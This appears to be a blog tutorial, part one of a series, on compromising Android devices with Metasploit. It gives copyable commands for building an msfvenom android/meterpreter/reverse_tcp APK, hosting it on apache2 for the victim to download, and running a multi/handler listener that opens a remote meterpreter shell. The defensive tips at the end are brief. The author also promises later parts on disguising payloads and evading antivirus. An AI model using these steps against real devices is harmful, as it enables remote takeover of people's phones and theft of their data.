Hacking Android Devices Using Metasploit-Framework (Part-1)

With over 3-Billion active users (Android Statistics 2024 Report) spanning over 190 countries it is pretty obvious- android security is a big concern. In the following article I will try my best to cover the basics of android hacking using metasploit framework and provide a few simple steps on how you can prevent yourself from possibly becoming a victim of such cyberattacks, lets get started!-

Requirements-

• Any preferred linux system with MSF installed on it. (I'll be using kali virtual machine).
• An android virtual machine (grab yours at- https://www.osboxes.org/android-x86/#android-x86-9-0-r2-info) *If you get an error while setting up these machines feel free to reach out to me personally for guidance*

Once you have both of our VMs up an running, we can start our hacking process-

Open terminal in linux and run the following command-

#ifconfig        

you might receive an output similar to the one below-

Here, my network interface is eth0 and my IP address is next to the heading 'inet' under eth0- note down this IP address as it will be extremely useful for us later.

Now we need to generate a basic payload which can be delivered to the target device. For this article, I will be using msfvenom to generate the payload but you can choose tool of your choice (fatrat is another really good tool for payload generation).

Run the following command by replacing the text enclosed within the <angle_brackets> with your own data-

#sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_IP> LPORT=<port_you_want_to_listen_on> -o <any_name>.apk        

This will prompt you to enter the password for the root user. Once done, we will be looking for the following output-

You can change the LPORT to your preferred port OR follow my port number as stated in the above picture.

Once the payload is generated you can use "ls" command to view your files.

The following section is for transferring payload to our target system. (if you are using any other way to transfer the payload, feel free to skip this section)

We now need a way to deliver our payload to the target machine, You can explore other ways but for this demonstration I will be using our apache2 web server which comes pre-loaded with kali. To enable apache2 run the following commands in the given order-

#sudo service apache2 start        

The command will not give you any output but we can check whether our server is up or not by opening the browser and searching for our IP address. If we get the following page, the service has successfully been started-

We now will move our payload to the sever so that we can download it on our target device (android VM).

We can use the following command for the same-

#sudo mv <any_name>.apk /var/www/html/        

You can visit the directory and use 'ls' command to verify the same.

On our android device we can visit the following link to download our payload- <attacker_IP>/<any_name>.apk

Once downloaded follow the usual installation process to install the application of the android device.

The actual "gaining access" part

Once you have delivered the payload to the target, we need to setup our msfconsole to listen for the incoming connections and to gain a shell to execute commands. The same can be set up using the following commands step wise-

#sudo msfconsole        

The above command will return the following screen-

here we can execute both system and metasploit commands by typing them under 'msf6>'.

Run the following commands in the given order separately-

msf6> use exploit/multi/handler

msf6> set payload android/meterpreter/reverse_tcp

msf6> set LHOST <your_IP>

msf6> set LPORT <port_selected_previously>        

The above commands will return the following if successfully executed-

type the following to start execution of listener on our end-

msf6> run        

Now, metasploit will wait for the target to execute the application (payload) on their end and provide us with the shell session once done. Till then we will have a screen as follows-

Once the target executes our apk file, We will get a session back along with the following screen-

We can notice our "Meterpreter session 1 opened" along with our "msf6>" converted to "meterpreter>" signaling that we have successfully entered the meterpreter shell session.

You can use "help" command to list all the other commands which you can execute on the target machine-

We have successfully gained access to our target!

How can we be safe from such attacks?

Unfortunately, you are highly prone to such attacks if-

• You love downloading APK files from third party providers.
• You have switched off the play-store application check security feature.
• You don't have a good anti-virus on your device.
• You don't take permissions granted to an application seriously.

So, the basics steps to stay secure are obvious by now-

• Avoid downloading APKs from third party providers, If extremely necessary use a trusted provider for the same.
• At all times, ensure that your play-store application check is turned on.
• Get a reputable anti-virus for your device.
• Finally, read each and every permission which an applications asks for carefully and stay away from applications which ask for access to resources out of scope of their operations.

But wait! "Vishesh! The payload was easy to identify given that it had a suspicious name and application logo."

Well, the ways to make your android payloads look genuine and to escape anti-virus detection is something which I will cover later under different parts of "Hacking Android Devices Using Metasploit-Framework" series till then- Stay Safe & Stay Vigilant!

signing off...